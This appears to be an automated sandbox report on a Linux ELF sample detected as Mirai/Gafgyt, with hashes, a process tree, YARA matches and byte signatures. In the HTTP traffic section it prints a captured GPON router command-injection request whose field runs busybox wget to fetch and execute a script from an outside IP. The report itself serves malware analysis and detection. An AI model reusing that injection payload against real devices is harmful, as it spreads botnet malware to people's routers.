Edit tour

Linux Analysis Report
enYTIDNSNe.elf

Overview

General Information

Sample Name:	enYTIDNSNe.elf
Original Sample Name:	c172d31c71333fd63839e629a6dabf2b.elf
Analysis ID:	1341483
MD5:	c172d31c71333fd63839e629a6dabf2b
SHA1:	8598b2bef303f8336fb210cea25a13ac2c807912
SHA256:	7c7290bcd96b542e211208c8799118b9bb352278ba990a029e29646d713a74ae
Tags:	32elfintelmirai
Infos:

Detection

Mirai

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Yara signature match

Sample has stripped symbol table

Detected TCP or UDP traffic on non-standard ports

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1341483
Start date and time:	2023-11-13 06:42:21 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	enYTIDNSNe.elf renamed because original name is a hash value
Original Sample Name:	c172d31c71333fd63839e629a6dabf2b.elf
Detection:	MAL
Classification:	mal80.troj.linELF@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/enYTIDNSNe.elf
PID:	6207
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Rakitin
Standard Error:

Process Tree

system is lnxubuntu20

enYTIDNSNe.elf (PID: 6207, Parent: 6125, MD5: c172d31c71333fd63839e629a6dabf2b) Arguments: /tmp/enYTIDNSNe.elf

enYTIDNSNe.elf New Fork (PID: 6208, Parent: 6207)

enYTIDNSNe.elf New Fork (PID: 6209, Parent: 6207)

enYTIDNSNe.elf New Fork (PID: 6210, Parent: 6209)

enYTIDNSNe.elf New Fork (PID: 6211, Parent: 6209)

enYTIDNSNe.elf New Fork (PID: 6213, Parent: 6209)

enYTIDNSNe.elf New Fork (PID: 6214, Parent: 6209)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
enYTIDNSNe.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
enYTIDNSNe.elf	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
enYTIDNSNe.elf	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
enYTIDNSNe.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
enYTIDNSNe.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
enYTIDNSNe.elf	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x2492:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
enYTIDNSNe.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe89e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
enYTIDNSNe.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd34b:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
enYTIDNSNe.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xc8c2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
enYTIDNSNe.elf	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0xf820:$x1: POST /cdn-cgi/ 0x1076c:$s1: LCOGQGPTGP 0x10440:$s3: CFOKLKQVPCVMP 0x10539:$s4: QWRGPTKQMP 0x10508:$s5: HWCLVGAJ
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6207.1.0000000008048000.000000000805a000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x2492:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe89e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd34b:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xc8c2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6207.1.0000000008048000.000000000805a000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0xf820:$x1: POST /cdn-cgi/ 0x1076c:$s1: LCOGQGPTGP 0x10440:$s3: CFOKLKQVPCVMP 0x10539:$s4: QWRGPTKQMP 0x10508:$s5: HWCLVGAJ
6213.1.0000000008048000.000000000805a000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x2492:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe89e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd34b:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xc8c2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6213.1.0000000008048000.000000000805a000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0xf820:$x1: POST /cdn-cgi/ 0x1076c:$s1: LCOGQGPTGP 0x10440:$s3: CFOKLKQVPCVMP 0x10539:$s4: QWRGPTKQMP 0x10508:$s5: HWCLVGAJ
6208.1.0000000008048000.000000000805a000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xfee4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x473:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5fa0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xc8f2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x2492:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xe89e:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd34b:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xc8c2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6208.1.0000000008048000.000000000805a000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0xf820:$x1: POST /cdn-cgi/ 0x1076c:$s1: LCOGQGPTGP 0x10440:$s3: CFOKLKQVPCVMP 0x10539:$s4: QWRGPTKQMP 0x10508:$s5: HWCLVGAJ
Process Memory Space: enYTIDNSNe.elf PID: 6207	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: enYTIDNSNe.elf PID: 6207	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x720:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: enYTIDNSNe.elf PID: 6208	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: enYTIDNSNe.elf PID: 6208	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x720:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: enYTIDNSNe.elf PID: 6213	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: enYTIDNSNe.elf PID: 6213	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x131b:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Click to see the 31 entries

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 38 32 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

Malicious sample detected (through community Yara rule)

Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: enYTIDNSNe.elf, type: SAMPLE	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
